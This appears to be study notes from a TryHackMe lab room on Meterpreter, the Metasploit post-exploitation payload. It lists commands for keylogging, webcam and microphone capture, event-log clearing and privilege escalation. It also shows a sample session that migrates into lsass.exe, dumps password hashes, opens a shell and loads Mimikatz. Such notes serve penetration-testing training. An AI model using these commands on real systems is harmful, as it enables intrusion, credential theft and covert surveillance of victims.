Meterpreter

https://tryhackme.com/r/room/meterpreter

Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter will run on the target system and act as an agent within a command and control architecture.

Meterpreter runs on a target system without being installed on it. It runs in memory (RAM - Random Access Memory) and does not write itself to the disk on the target. Meterpreter thus tries to avoid being detected by antivirus and is seen as a process and does not have a file on the target system. Meterpreter also uses encrypted communication with the server where Metasploit runs.

Use the following command to display meterpreter payloads:

msfvenom --list payloads | grep meterpreter

Meterpreter Commands

Core commands:

  • ?: Help Menu

  • background: Backgrounds current session

  • exit: Terminates session

  • guid: Get session GUID

  • info: Display post module information

  • irb: Opens interactive ruby shell

  • load: Loads one or more meterpreter extensions

  • migrate: Migrates meterpreter process to another process

  • run: Executes a meterpreter script or post module

  • sessions: Quickly switch to another session

File and networking commands:

  • search: Searches for files

  • upload: Uploads file or directory

  • download: Downloads a file or directory

  • netstat: Displays the network connections

  • portfwd: Forwards a local port to a remote service

  • route: Allows to view and modify routing table

System commands:

  • clearev: Clears events logs

  • execute: Executes a command

  • getpid: Shows current process identifier

  • kill: Terminates process

  • reboot: Reboots remote computer

  • shell: Drops into system command shell

  • sysinfo: Gets information about remote system

Other commands:

  • idletime: Returns the number of seconds remote user is idle

  • keyscan_dump: Dumps the keystroke buffer

  • keyscan_start: Starts capturing keystrokes

  • keyscan_stop: Stops capturing keystrokes

  • screenshare: Allows you to watch the remote user's desktop

  • record_mic: Records audio from default microphone

  • webcam_chat: Starts video chat

  • webcam_stream: Plays a video stream from the specified webcam

  • getsystem: Attempts to elevate privilege

  • hashdump: Dumps contents of SAM database

Post Exploitation

The migrate command is a way to migrate to another process to aid in continued interaction. This can be helpful to creat a more stable meterpreter session. It can also be used to conduct keylogger attacks by migrating to a process like word.exe, notepad.exe, or even a browser.

The following would be a sample command execution involving migration:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > ps

PID  PPID  Name       Arch  Session  User
---  ----  ----       ----  -------  ----
716  596   lsass.exe  x64   0        NT AUTHORITY\SYSTEM
...

meterpreter > migrate 716
[*] Migrating from 1304 to 716...
[*] Migration completed successfully.

meterpreter > hashdump
Administrator:500:aad3b51404eeab3b456b51:31243f0ae90cc89c0:::

meterpreter > shell
Process 2124 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Post exploitation using meterpreter can be split into the following categories:

  • Gathering further intelligence about the target system

  • Searching for files, credentials, interfaces, and further information

  • Privilege escalation

  • Lateral movement

The following command can be used to load Mimikatz, a great tool for post exploitation and privilege escalation on Windows machines:

meterpreter > load kiwi
Loading extention kiwi... mimikatz 2.2.0 20191125 (x64/windows)
PreviousMetasploitNextKOTH

Last updated